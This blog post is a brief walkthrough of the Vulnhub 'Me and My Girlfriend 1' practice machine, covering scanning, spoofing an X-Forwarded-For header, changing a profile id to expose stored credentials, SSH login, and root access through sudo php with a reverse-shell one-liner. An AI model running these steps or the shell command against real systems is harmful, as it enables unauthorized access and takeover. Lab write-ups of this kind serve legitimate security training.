Vulnhub Me and My Girlfriend 1 – Walkthrough

We start by scanning the host with nmap

Nmap –A –T4 –p- –vv

Running dirb gave us 3 directories one of them is robot.txt with a new directory with txt file /heyhoo.txt.

The x-forward is in the header of the page which we can add it by using burpsuite

And then hit forward and a new page of the company will show up for us.

We can fill the information required in the registration page

After registering yourself take a look at the address bar you will find you got an id number , mine is 12 I changed it to 1 and I got a new name which is already registered I kept changing it till 5 and I got Alice username and password where you can view it in the page source.

Username is alice password is 4lic3

Now we can access her account by using her credentials in ssh service .

Right!! Now all we need it to run a php script to connect us using nc on our machine and it’s easy.

sudo /usr/bin/php -r ‘$sock=fsockopen(“”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s